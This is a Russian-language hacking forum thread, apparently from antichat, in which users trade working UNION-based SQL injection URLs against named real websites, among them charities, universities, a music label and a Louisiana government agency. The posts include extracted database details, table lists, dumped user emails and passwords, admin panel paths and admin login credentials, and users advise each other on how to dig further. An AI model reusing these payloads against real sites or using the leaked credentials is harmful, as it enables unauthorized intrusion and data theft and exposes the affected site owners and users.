SQL Инъекции

www.sonybmgmusic.co.uk
Просто красивая(как мне кажется) иньекция..
Пользователи, их пароли:

P.S. Это не боян,
гуглим site:forum.antichat.ru sonybmgmusic.co.uk/
результат выдал адрес
https://forum.antichat.ru/printthread.php?t=21336&page=617&pp=10
где находится сообщение пользователя Buddah:
"нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет"
sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/* 0" - а это почти ничего, тут даже инъекции нет, потаму что кроме других неверных моментов (которые имеют место быть), в первую очередь тут знак + не проходит за пробел, а проходит как просто символ '+', уже поэтому никакого order by в таком виде не будет. Написал это, потаму что кто-то обвинил в том, что я кинул боян.

 

{PR6}
http://www.effwa.org/main/page.php?number=72+UNI ON+SELECT+0,1,2,3,4,5,concat(table_name,0x0b,column_name),7,8,9,10,11,12,0x73716C696E6A666C643137,0x73716C696E6A666C643137,0x73716C696E6A666C643137,0x73716C696E6A666C643137+FROM+INFORMATION_SCHEMA.COLUMN S--


[email protected]
5.0.67-log
effwa

{PR4}
http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x 0b,vers ion(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

5.0.67
[email protected]
vidarMain

Все таблицы
http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x0b,table_name,col umn_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns

{PR6}
http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,conc at_ws(0x0b,user(),version(),dat abase()),4,5,6,7,8,9,10+--+

thecock@localhost
4.0.20-standard
tc21


http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,con cat_ws(0x0b,email,pas s),4,5,6,7,8,9,10+FROM+tc21.users+LIMIT+8500,1+--+

Юзеры 8500 человек

 

www.chehaliscoral.com

Code:

http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,version(),user(),database()),2/*

Версия - 5.0.33:
Юзер - chehaliscoral@localhost
БД - chehaliscoral

Юзеры:

Code:

http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,id,password,email),2+from+users+limit+0,1/*

Code:

5:234:ryan

Админка:

Code:

http://www.chehaliscoral.com/admin

Code:

Username - ryan
Password - 234

 

_http://www.floramed.ru/detailnews.php?id=-115+union+select+1,2,concat_ws(0x3a,version(),user(),database())

4.0.27-log:[email protected]:flora

_http://www.adameva.ru/index.php?link_n=6&id_theme=30012&page=1&id_section=923+union+select+concat_ws(0x3a,EMAIL_USER,PASSWORD)+from+users+limit+1,1--&forum_desc=

[email protected]USHKA

 

All India Oracle Users Group
Google PageRank : 4

version 5.0.67-msl-icd1-log
user aioug@localhost
database aioug_dbt


columns from users

(email,pass)

 

Code:

http://4e.plantphys.net/printer.php?ch=5&id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10

plantphy@localhostlantphys_4e:4.0.14-standard-log

 

ПР5
http://sozmod.eawag.ch/cv.php?id=1+union+select+unhex(hex(TABLE_NAME))+from+information_schema.tables+/*+

ПР5
http://www.enrd.org/publications.php?id=-3+union+select+1,2,concat_Ws(0x3a3a,tcuser,tcpass,email,tcid,tcname),4,5,6,7+from+tbltelecenter--
rajukhanal::rainakhanal::[email protected]::1::Ghorepani Telecenter

 

http://uac.unborn.at/forumv2.php?cat=4'+and+0+union+select+1,2,concat_ws(0x20,id,nick,pw,nname,icq,mail),4,5,6+from+users+where+id=1/*

 

Астранань.ру

http://www.astrakhan.ru/humour/?cmd=read_full&id=%27+UNION+SELECT+1,2,3,4,password,6,7,8+FROM+astrakhan.portal_users+where+login=%27tHunder%27/*

 

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+TABLE_NAME,2+from+information_schema.tables+limit+197,1000--

tables:
jos_users
user
virtual_users
virtual_domains
view_users
users
series_users
series
seminarios
turba_shares_users
nag_shares_users
mnemo_shares_users
ingo_shares_users
horde_users
wp_users
usuarios
Таблицы все закрыты((

http://ifisc.uib.es/publications/publications.php?id=-10+union+select+concat_ws(0x3a3a,user,password),2+from+mysql.user--

 

version 4.0.17-nt
user root@localhost
database tau

 

[email protected]
caramel
5.0.75-log

В таблицах ниче интересного, админки нет

 

ПР5
http://www.fraudadvisorypanel.org/newsite/publications.php?c_id=-1+union+select+1,2,username,password,id,6,7,8,9,10,11,12,13+from+members/*

davido1 leaden
Админку не нашёл(

 

http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+23,1/*
через column_name узнал, что в этой таблице есть id,login,password
дальше копать не могу, не позволяют знания пока...

попробовал: http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,login,4,5,6,7,8,9,10,11+from+admin/*
не работает...

p.s. ТИЦ 40
Если кто докопает что-интересного, напишите в лс, хотя бы понять что не правильно делал.

 

AlexSatter ня

ошибка твоя заключалась в том что таблицы admin небыло в бд под которой сайт работает.

 

http://www.izone.ru/soft_admin/go.php?action=home&id=3075-1+union+select+concat(version(),char(58),database(),char(58),user())
Дальше непрёт, хз какие там таблицы, в information_schema не роет. Есль кто подберёт, мне напишите, ок
зы: в адресную строку смотрите ))

 

----------------
http://www.lhfa.louisiana.gov/news/news_detail.php?ID=-100'+union+select+1,2,3,4,5,6,7,8,9/*
----------------------------------
Database Version: 5.0.45
Database name: lhfa2
User name: lhfa@localhost
------------------------------------

/admin/​

|----------------------------------|
admin : Lhfa$543
|----------------------------------|​